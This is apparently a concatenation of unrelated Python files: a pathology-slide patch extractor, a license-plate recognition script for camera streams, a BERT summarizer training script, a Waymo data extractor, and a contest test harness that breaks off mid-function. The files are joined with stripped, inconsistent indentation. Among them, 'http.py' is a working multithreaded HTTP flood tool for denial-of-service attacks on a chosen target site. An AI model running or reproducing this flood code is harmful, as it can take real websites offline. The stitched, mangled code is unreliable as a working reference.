            # the hotspot is an axis-aligned rectangle; use its width as the (square) crop size
            size = int(asap_coord[2][0] - asap_coord[0][0])
elif group == 'lymphocytes':
top_left_coord = [int(i-self.lymph_patch_size/2) for i in asap_coord]
size = self.lymph_patch_size
elif group == 'tumorbuds':
top_left_coord = [int(i-self.tb_patch_size/2) for i in asap_coord]
size = self.tb_patch_size
else:
print('Invalid group')
return
return top_left_coord, size
def parse_xml(self, file_path):
# reads the xml files and retrieves the coordinates of all elements with the coord_annotation_tag
tree = ET.parse(file_path)
root = tree.getroot()
annotations_elements = {g: [] for g in self.groups}
for i in root.iter('Annotation'):
if i.attrib['PartOfGroup'] in annotations_elements:
annotations_elements[i.attrib['PartOfGroup']].append(i)
annotations = {g: [] for g in self.groups}
for group, element_list in annotations_elements.items():
for element in element_list:
if element.attrib['Type'] == 'Dot':
annotation = [[float(i.attrib['X']), float(i.attrib['Y'])] for i in element.iter('Coordinate')][0]
else:
annotation = [[float(i.attrib['X']), float(i.attrib['Y'])] for i in element.iter('Coordinate')]
# get the id (used as node id later)
annot_id = int(element.attrib['Name'].split(' ')[-1])
annotations[group].append((annot_id, annotation))
return annotations
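    # For reference, the ASAP xml parsed above typically has a structure along these
    # lines (simplified sketch, not taken from this project's data):
    #
    #   <ASAP_Annotations>
    #     <Annotations>
    #       <Annotation Name="Annotation 0" Type="Dot" PartOfGroup="lymphocytes">
    #         <Coordinates>
    #           <Coordinate Order="0" X="12345.6" Y="6789.0" />
    #         </Coordinates>
    #       </Annotation>
    #     </Annotations>
    #   </ASAP_Annotations>
    #
    # Dot annotations yield a single [X, Y] pair; other types (e.g. the hotspot
    # rectangle) yield a list of corner coordinates.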
def extract_crop(self, wsi_img, top_left_coord, size):
# crop the region of interest from the mrxs file on the specified level
# get the level and the dimensions
id_level = np.argmax(np.array(wsi_img.level_downsamples) == self.level)
dims = wsi_img.level_dimensions[id_level]
# TODO make sure the dimension we want to crop are within the image dimensions
# extract the region of interest
img = wsi_img.read_region(top_left_coord, id_level, (size, size))
        # convert the PIL image to a numpy array
        img = np.array(img)
        # white out pixels that are not fully opaque (unscanned background)
        img[img[:, :, 3] != 255] = 255
return img
def parse_matched_files_excel(self) -> pd.DataFrame:
df = pd.read_excel(self.matched_files_excel, sheet_name=self.matched_excel_info['sheet_name'], engine='openpyxl')
# remove two empty top lines and set third line to header
df.columns = df.iloc[2]
df = df.iloc[3:]
# drop all rows that do not contain 0 or 1 in column "Need resection?" (excluded because no data available)
df = df.drop(df[~df["Need resection?"].isin([0, 1])].index)
# drop all rows that do not contain a file name
# TODO: make this neater
df = df[df[self.matched_excel_info['wsi_col']].notna()]
df = df[df[self.matched_excel_info['file_id_col']].notna()]
df = df.drop(df[df[self.matched_excel_info['wsi_col']].isin(["tbd", "na"])].index)
df = df.drop(df[df[self.matched_excel_info['file_id_col']].isin(["tbd", "na"])].index)
return df
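# Hedged usage sketch: the class is normally driven through fire (see below), but it
# can also be used programmatically. The paths 'slides/', 'xmls/' and 'patches/' are
# placeholders for illustration, not paths from this project.
def _example_usage():  # illustration only, never called
    extractor = BTPatchExtractor(file_path='slides', output_path='patches',
                                 asap_xml_path='xmls', hotspot=True, level=0,
                                 lymph_patch_size=300, tb_patch_size=300, n_threads=6)
    extractor.process_files()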
if __name__ == '__main__':
fire.Fire(BTPatchExtractor).process_files()
|
anpr_camera_stream.py
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function
import argparse
import csv
import io
import os
from datetime import datetime
from threading import Thread
import cv2
import requests
from PIL import Image
os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "rtsp_transport;udp"
def parse_arguments():
parser = argparse.ArgumentParser(
description=
'Read license plates from a RTSP stream and save the result in a CSV file.',
epilog=
'For example: anpr_camera_stream.py --camera rtsp://192.168.1.2:5554/camera --api-key TOKEN --regions fr --output /path/to/output.csv'
)
parser.add_argument('--api-key', help='Your API key.', required=True)
parser.add_argument('--camera', help='RTSP stream url.', required=True)
parser.add_argument(
'--regions',
help='Regions http://docs.platerecognizer.com/#regions-supported.',
required=False)
parser.add_argument('--output', help='CSV output file.', required=True)
parser.add_argument(
'--show-image',
help='Show a window with the frame being sent for recognition.',
action='store_true')
parser.add_argument(
'--inference-server',
help='Server used for recognition. Default to cloud server.',
default='https://api.platerecognizer.com/v1/plate-reader/')
return parser.parse_args()
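# ThreadedCamera continuously reads frames from the RTSP stream on a background
# daemon thread, so the recognition loop below always works on the most recent
# frame instead of draining a growing backlog of stale frames.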
class ThreadedCamera(object):
def __init__(self, args):
self.capture = cv2.VideoCapture(args.camera, cv2.CAP_FFMPEG)
self.capture.set(cv2.CAP_PROP_BUFFERSIZE, 1)
if not self.capture.isOpened():
print('No stream available: ' + args.camera)
        # initialise state before starting the reader thread to avoid a race where
        # the first frame read by the thread is immediately overwritten with None
        self.frame = None
        self.status = False
        self.thread = Thread(target=self.update, args=())
        self.thread.daemon = True
        self.thread.start()
def update(self):
while self.capture.isOpened():
(self.status, self.frame) = self.capture.read()
def get_frame(self,):
if self.frame is None or not self.status:
return
cv2.waitKey(1)
return self.frame
def capture(args, writer):
camera = ThreadedCamera(args)
while camera.capture.isOpened():
frame = camera.get_frame()
if frame is None:
continue
if args.show_image:
cv2.imshow('frame', frame)
        buffer = io.BytesIO()
        # OpenCV delivers frames in BGR order; convert to RGB before encoding with PIL
        im = Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
        im.save(buffer, 'JPEG')
        buffer.seek(0)
response = requests.post(
args.inference_server,
files=dict(upload=buffer),
data=dict(regions=args.regions or ''),
headers={'Authorization': 'Token ' + args.api_key})
res = response.json()
for result in res['results']:
writer.writerow(
dict(date=datetime.today().strftime('%x %X'),
license_plate=result['plate'],
score=result['score'],
dscore=result['dscore'],
vehicle_type=result['vehicle']['type']))
def main():
args = parse_arguments()
with open(args.output, 'w') as output:
fields = ['date', 'license_plate', 'score', 'dscore', 'vehicle_type']
writer = csv.DictWriter(output, fieldnames=fields)
writer.writeheader()
capture(args, writer)
if __name__ == "__main__":
main()
|
train.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import heapq
import torch
from pytorch_pretrained_bert import BertConfig
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.model_builder import Summarizer
from models.trainer import build_trainer
from others.logging import logger, init_logger
from others.utils import test_rouge, rouge_results_to_str
import models.data_util as du
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers','encoder','ff_actv', 'use_interval','rnn_size']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def multi_main(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' %gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train(args,device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def wait_and_validate(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
#for i, cp in enumerate(cp_files):
for i, cp in enumerate(cp_files[-30:]): #revised by Keping
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
#if the model currently under validation is 10 models further from the best model, stop
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
model.load_cp(checkpoint)
model.eval()
valid_iter =data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, model, None)
stats = trainer.validate(valid_iter, step, valid_by_rouge=args.valid_by_rouge)
return stats.xent()
def test(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
#model.load_cp(checkpoint) #TODO: change it back to strict=True
model.load_cp(checkpoint, strict=False)
model.eval()
trainer = build_trainer(args, device_id, model, None)
#if False:
#args.block_trigram = True
#if not args.only_initial or args.model_name == 'seq':
if args.model_name == 'base':
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer.test(test_iter,step)
else:
test_iter =data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer.iter_test(test_iter,step)
#for iterative ranker, evaluate both initial ranker and iterative ranker
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter =data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, None, None)
#
if (cal_lead):
trainer.test(test_iter, 0, cal_lead=True)
elif (cal_oracle):
trainer.test(test_iter, 0, cal_oracle=True)
def train(args, device_id):
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
# temp change for reducing gpu memory
model = Summarizer(args, device, load_pretrained_bert=True)
#config = BertConfig.from_json_file(args.bert_config_path)
#model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
if args.train_from != '': #train another part from beginning
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
model.load_cp(checkpoint, strict=False)
        # checkpoint keys may not fully match the model, hence strict=False
#optim = model_builder.build_optim(args, model, checkpoint)
optim = model_builder.build_optim(args, model, None)
if args.model_name == "ctx" and args.fix_scorer:
logger.info("fix the saliency scorer")
#for param in self.bert.model.parameters():
for param in model.parameters():
param.requires_grad = False
if hasattr(model.encoder, "selector") and model.encoder.selector is not None:
for param in model.encoder.selector.parameters():
param.requires_grad = True
#print([p for p in model.parameters() if p.requires_grad])
else:
optim = model_builder.build_optim(args, model, None)
logger.info(model)
trainer = build_trainer(args, device_id, model, optim)
_, neg_valid_loss = trainer.train(train_iter_fct, args.train_steps)
while len(neg_valid_loss) > 0:
#from 3rd to 2nd to 1st.
neg_loss, saved_model = heapq.heappop(neg_valid_loss)
print(-neg_loss, saved_model)
step = int(saved_model.split('.')[-2].split('_')[-1])
test(args, device_id, saved_model, step)
logger.info("Finish!")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-bert_data_path", default='../bert_data/cnndm')
parser.add_argument("-model_path", default='../models/')
parser.add_argument("-result_path", default='../results/cnndm')
parser.add_argument("-temp_dir", default='../temp')
#parser.add_argument("-bert_config_path", default='../bert_config_uncased_base_small.json')
parser.add_argument("-bert_config_path", default='config/bert_config_uncased_base.json')
parser.add_argument("-model_name", default='ctx', type=str, choices=['base', 'ctx', 'seq'])
parser.add_argument("-mode", default='train', type=str, choices=['train','validate','test','lead','oracle','getrouge'])
parser.add_argument("-sent_sel_method", default='truth', type=str, choices=['truth','lead','model'])
parser.add_argument("-max_label_sent_count", default=3, type=int)
parser.add_argument("-label_format", default='soft', type=str, choices=['soft', 'greedy'], help = "soft:distribution from rouge scores; greedy: sentences with max 3-k(max sentetence limite - number of selected sentences) ROUGE scores set to 1 the other set to 0")
parser.add_argument("-use_rouge_label", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-use_doc", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-salience_softmax", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-valid_by_rouge", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-loss", default='wsoftmax', type=str, choices=['bce','wsoftmax'])
parser.add_argument("-aggr", default='last', type=str, choices=['last', 'mean_pool', 'max_pool'])
    # if it is last, only the embedding at step t-1 is used to predict the sentence at step t, same as in translation
parser.add_argument("-rand_input_thre", default=1.0, type=float, help="the probability of keep the original labels of the selected sentences")
parser.add_argument("-seg_count", default=30, type=int, help="how many segs to divide similarity score")
parser.add_argument("-ngram_seg_count", default='20,20,20', type=str, help="seg count for unigram, bigram and trigram, has to be 3 int separated with comma" )
parser.add_argument("-bilinear_out", default=10, type=int, help="dimension of the bilinear output")
parser.add_argument("-temperature", default=20, type=float)
parser.add_argument("-fix_scorer", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-max_epoch", default=2, type=int)
parser.add_argument("-batch_size", default=3000, type=int)
parser.add_argument("-use_interval", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-hidden_size", default=128, type=int)
parser.add_argument("-ff_size", default=2048, type=int)
parser.add_argument("-heads", default=8, type=int)
parser.add_argument("-inter_layers", default=2, type=int)
parser.add_argument("-rnn_size", default=512, type=int)
parser.add_argument("-param_init", default=0, type=float)
parser.add_argument("-param_init_glorot", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-dropout", default=0.1, type=float)
parser.add_argument("-optim", default='adam', type=str)
parser.add_argument("-lr", default=0.002, type=float)
parser.add_argument("-beta1", default= 0.9, type=float)
parser.add_argument("-beta2", default=0.999, type=float)
parser.add_argument("-decay_method", default='noam', type=str)
parser.add_argument("-warmup_steps", default=10000, type=int)
parser.add_argument("-max_grad_norm", default=0, type=float)
parser.add_argument("-save_checkpoint_steps", default=2000, type=int)
parser.add_argument("-save_model_count", default=3, type=int)
parser.add_argument("-accum_count", default=1, type=int)
parser.add_argument("-world_size", default=1, type=int)
parser.add_argument("-report_every", default=50, type=int)
parser.add_argument("-train_steps", default=50000, type=int)
parser.add_argument("-recall_eval", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument('-visible_gpus', default='-1', type=str)
parser.add_argument('-gpu_ranks', default='0', type=str)
parser.add_argument('-log_file', default='../logs/cnndm.log')
parser.add_argument('-dataset', default='')
parser.add_argument('-seed', default=666, type=int)
parser.add_argument("-test_all", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-test_from", default='')
parser.add_argument("-train_from", default='')
parser.add_argument("-report_rouge", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-report_precision", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-block_trigram", type=str2bool, nargs='?', const=True, default=True)
args = parser.parse_args()
args.gpu_ranks = [int(i) for i in args.gpu_ranks.split(',')]
#this variable should not be set on gypsum
#os.environ["CUDA_VISIBLE_DEVICES"] = args.visible_gpus
os.system('mkdir -p %s' % (os.path.dirname(args.log_file)))
#if not args.bert_data_path.endswith("cnndm") and not args.bert_data_path.endswith("msword"):
# args.bert_data_path = args.bert_data_path + "/cnndm"
#for notebook running, cnndm is not a directory name, it is prefix
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
device_id = 0 if device == "cuda" else -1
if(args.world_size>1):
multi_main(args)
elif (args.mode == 'train'):
train(args, device_id)
elif (args.mode == 'validate'):
wait_and_validate(args, device_id)
elif (args.mode == 'lead'):
baseline(args, cal_lead=True)
elif (args.mode == 'oracle'):
baseline(args, cal_oracle=True)
elif (args.mode == 'test'):
cp = args.test_from
if cp == '':
model_dir = args.model_path
print(model_dir)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
for cp in cp_files:
step = int(cp.split('.')[-2].split('_')[-1])
test(args, device_id, cp, step)
else:
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test(args, device_id, cp, step)
elif (args.mode == 'getrouge'):
if args.model_name == 'base':
pattern = '*step*initial.candidate'
else:
pattern = '*step*.candidate' #evaluate all
candi_files = sorted(glob.glob("%s_%s" % (args.result_path, pattern)))
#print(args.result_path)
#print(candi_files)
for can_path in candi_files:
gold_path = can_path.replace('candidate', 'gold')
rouge1_arr, rouge2_arr = du.compute_metrics(can_path, gold_path)
step = os.path.basename(gold_path)
precs_path = can_path.replace('candidate', 'precs')
all_doc_ids = du.read_prec_file(precs_path)
rouge_str, detail_rouge = test_rouge(args.temp_dir, can_path, gold_path, all_doc_ids, show_all=True)
logger.info('Rouges at step %s \n%s' % (step, rouge_str))
result_path = can_path.replace('candidate', 'rouge')
if detail_rouge is not None:
du.output_rouge_file(result_path, rouge1_arr, rouge2_arr, detail_rouge, all_doc_ids)
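# Hedged examples of how this script is typically invoked (paths and flag values
# below are placeholders, not project defaults):
#   python train.py -mode train -bert_data_path ../bert_data/cnndm -model_path ../models/ \
#       -visible_gpus 0 -gpu_ranks 0 -world_size 1 -log_file ../logs/cnndm.log
#   python train.py -mode validate -test_all true -model_path ../models/
#   python train.py -mode test -test_from ../models/model_step_50000.pt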
|
http.py
|
#!/usr/bin/env python3
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import requests
import random
import time
from threading import Thread
# Import modules for HTTP flood
import tools.randomData as randomData
import tools.ipTools as ipTools
def HTTP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
if ipTools.isCloudFlare(target):
print("\033[1;33m"+"[!]"+"\033[0m"+" This site is under CloudFlare protection.")
if input("\033[1;77m"+"[?]"+"\033[0m"+" Continue HTTP attack? (y/n): ").strip(" ").lower() != "y":
exit()
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting HTTP attack...")
threads_list = []
# Load 25 random user agents
user_agents = []
for _ in range(threads):
user_agents.append( randomData.random_useragent() )
# HTTP flood
def http_flood():
global FINISH
while True:
if FINISH:
break
payload = str(random._urandom(random.randint(1, 30)))
headers = {
"X-Requested-With": "XMLHttpRequest",
"Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"Accept-Encoding": "gzip, deflate, br",
"User-agent": random.choice(user_agents)
}
try:
r = requests.get(target, params = payload)
except Exception as e:
print(e)
time.sleep(2)
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" HTTP packet was sent! Packet size: " + str(len(payload)) + ".")
# Start threads
for thread in range(0, threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = http_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;33m"+"[!]"+"\033[0m"+" HTTP attack completed.")
|
1extract_image_label.py
|
"""
Taken and Customized from:
https://github.com/KushalBKusram/WaymoDataToolkit
"""
"""
As step 1
Extract images and labels from segment
"""
import time
import threading
from datetime import timedelta
import util_image_label as WODKit
if __name__=="__main__":
#Path where the input and output folders are available
main_path = "/home/eyuell/Desktop/ForD/WAYMO"
segments_dir = main_path + "/input/segment"
output_dir = main_path + "/output"
start = time.time()
print('Processing . . . \r')
toolkit = WODKit.ToolKit(training_dir=segments_dir, save_dir=output_dir)
# clear images, labels, consolidation and ped lists from previous execution
toolkit.refresh_dir(dir="{}/camera/images".format(output_dir))
toolkit.refresh_dir(dir="{}/camera/labels".format(output_dir))
toolkit.refresh_dir(dir="{}/consolidation".format(output_dir))
open("{}/camera/ped_frames_file.txt".format(output_dir), 'w').write("{}".format(""))
# prepare for progress monitoring
i = 0
segments = toolkit.list_training_segments()
size = len(segments)
# Process through all segments
for segment in segments:
i += 1
#print('Processing . . . {}/{} ({:.2f}%) \r'.format(i, size, (i/size) * 100))
print('Processing . . . segment {} of {}\r'.format(i, size))
threads = []
toolkit.assign_segment(segment, i)
t1 = threading.Thread(target=toolkit.extract_camera_images)
t1.start()
threads.append(t1)
for thread in threads:
thread.join()
toolkit.consolidate()
#break # if only for one segment
# Concluding
end = time.time()
elapsed = end - start
t_del = timedelta(seconds=elapsed)
if i == size:
print('\nDone! Duration= {}\n'.format(t_del))
else:
print('\nExited! Duration= {}\n'.format(t_del))
|
tester.py
|
#!/usr/bin/env python3
# Author: Psyho
# Twitter: https://twitter.com/fakepsyho
#TODO:
# HIGH PRIORITY:
# -create proper ReadMe
# -more error checking / clearer error messages
# -fix grouping/filtering if data file doesn't contain all test cases
# -add warnings if data is not present for all test cases?
# -config: merge subgroups (you need at least one?)
# -fix double printing progress bug
# -above + customization of scripts in the config
# -mode show simple histogram for stats
# -test functionality for atcoder
#   -double check that topcoder functionality is not broken
# -find a way to make atcoder score consistent with local (score_mul parameter? / is it needed?)
# -add option to print parsed commands (or maybe just print when encountered an error?)
# -add an option for custom scoreboard ordering? (would simply show_XXX options)
# LOW PRIORITY:
#   -add a future proof mechanism for missing lines in config files? (will happen if someone updates the tester but the config file stays the same)
# -add option to shorten group names?
# -use --tests for --find?
# -add support for custom scoring (cfg would be python code?)
# -add RUNNER parameters (like for hash code) (Moved to RUNNER?)
# -add batching? (Moved to RUNNER?)
# -sync with RUNNER? (how?)
# -add cleanup on ctrl+c (what that would be?)
# -change to subparsers (exec / show / find?)
# -simplify parameters in config (some parameters are redundant)
# -add autodetect for atcoder run/gen cmd (should be easy if files have original names)
# -add some lock against running atcoder's gen multiple times at the same time
# -improve script generation?
# ???:
# -show: add transpose?
# -is it possible to monitor cpu% and issue warning (too many threads); useful for running on cloud with tons of threads
# -add html export option for --show?
# -add comments to code (explaining functions should be enough)
# -add more annotations to functions
import tabulate
import re
import math
import sys
import os
import argparse
import subprocess
import glob
import json
import time
import configparser
import shutil
import traceback
import _thread
from typing import List, Dict, Union
import queue
from threading import Thread
from . import __version__
args = None
cfg = None
DEFAULT_CONFIG_PATH = 'tester.cfg'
tests_queue = queue.Queue()
results_queue = queue.Queue()
def try_str_to_numeric(x):
if x is None:
return None
try:
return int(x)
except ValueError:
try:
return float(x)
except ValueError:
return x
def fatal_error(msgs, exit_main=False):
if isinstance(msgs, str):
msgs = [msgs]
print('Fatal Error:', msgs[0])
for msg in msgs[1:]:
print(msg)
if exit_main:
os._exit(1)
else:
sys.exit(1)
def run_test(test) -> Dict:
seed = test['seed']
run_dir = args.name or '_default'
output_dir = cfg["general"]["tests_dir"] + (f'/{run_dir}' if cfg["general"]["merge_output_dirs"].lower() == "false" else '')
os.makedirs(output_dir, exist_ok=True)
def parse_cmd(s):
s = s.replace('%SEED%', str(seed))
for i in range(1, 10):
s = s.replace(f'%SEED0{i}%', f'{seed:0{i}}')
s = s.replace('%OUTPUT_DIR%', output_dir)
s = s.replace('%TESTER_ARGS%', args.tester_arguments)
if '%GEN_INPUT%' in s:
s = s.replace('%GEN_INPUT%', str(test['path']))
return s
cmd = parse_cmd(cfg['general']['cmd_tester'])
output_files = [parse_cmd(s) for s in cfg['general']['output_files'].split(',')]
# print(cmd)
# print(output_files)
subprocess.run(cmd, shell=True)
rv = {'id': seed}
for output_file in output_files:
with open(output_file) as f:
for line in f:
# XXX: maybe change to regex if they aren't much slower
tokens = line.split()
if len(tokens) == 3 and tokens[0] == 'Score' and tokens[1] == '=':
rv['score'] = float(tokens[2])
if len(tokens) == 7 and tokens[0] == 'Score' and tokens[1] == '=' and tokens[3] == 'RunTime' and tokens[4] == '=' and tokens[6] == 'ms':
rv['score'] = float(tokens[2][:-1])
rv['time'] = float(tokens[5])
if len(tokens) == 4 and tokens[0] == '[DATA]' and tokens[2] == '=':
rv[tokens[1]] = try_str_to_numeric(tokens[3])
if cfg['general']['keep_output_files'].lower() != 'true':
os.remove(output_file)
if 'score' not in rv:
        print(f'\r[Error] Seed: {seed} contains no score')
return rv
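# The parsing above expects the tester/scorer output to contain lines shaped like the
# following (illustrative examples, values are made up):
#   Score = 1234.5
#   Score = 1234.5, RunTime = 812 ms
#   [DATA] N = 50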
def find_res_files(dir='.'):
return glob.glob(f'{dir}/*{cfg["general"]["results_ext"]}')
def load_res_file(path) -> Dict[int, float]:
if not os.path.exists(path):
fatal_error(f'Cannot locate {path} results file')
with open(path) as f:
lines = f.read().splitlines()
results = [json.loads(line) for line in lines]
return {result['id']: result for result in results}
def process_raw_scores(scores: List[float], scoring: str) -> List[float]:
if scoring=='raw':
return scores
if scoring=='min':
best_score = min([math.inf] + [score for score in scores if score >= 0])
return [best_score / score if score >= 0 else 0 for score in scores]
if scoring=='max':
best_score = max([0] + [score for score in scores if score >= 0])
return [score / best_score if score > 0 else 0 for score in scores]
fatal_error(f'Unknown scoring function: {scoring}')
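# Tiny worked example of the relative scoring above (hypothetical raw scores, where a
# negative score marks a failed test):
#   raw scores [10, 20, -1] with scoring='min' -> [1.0, 0.5, 0]   (10 is best)
#   raw scores [10, 20, -1] with scoring='max' -> [0.5, 1.0, 0]   (20 is best)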
def apply_filter(tests, data, filter):
var, range = filter.split('=')
if '-' in range:
lo, hi = range.split('-')
lo = try_str_to_numeric(lo) if lo else min([data[test][var] for test in tests])
hi = try_str_to_numeric(hi) if hi else max([data[test][var] for test in tests])
return [test for test in tests if lo <= data[test][var] <= hi]
else:
value = try_str_to_numeric(range)
return [test for test in tests if data[test][var] == value]
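# Filter strings passed via --filters/--groups use the syntax handled above, e.g.
# (variable names are placeholders for whatever [DATA] keys your tester emits):
#   N=10-50    keeps tests whose data value N lies in [10, 50] (either bound may be omitted)
#   type=2     keeps tests whose data value equals 2 exactly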
def show_summary(runs: Dict[str, Dict[int, float]], tests: Union[None, List[int]] = None, data=None, groups=None, filters=None):
if not tests:
tests_used = [set(run_results.keys()) for run_name, run_results in runs.items()]
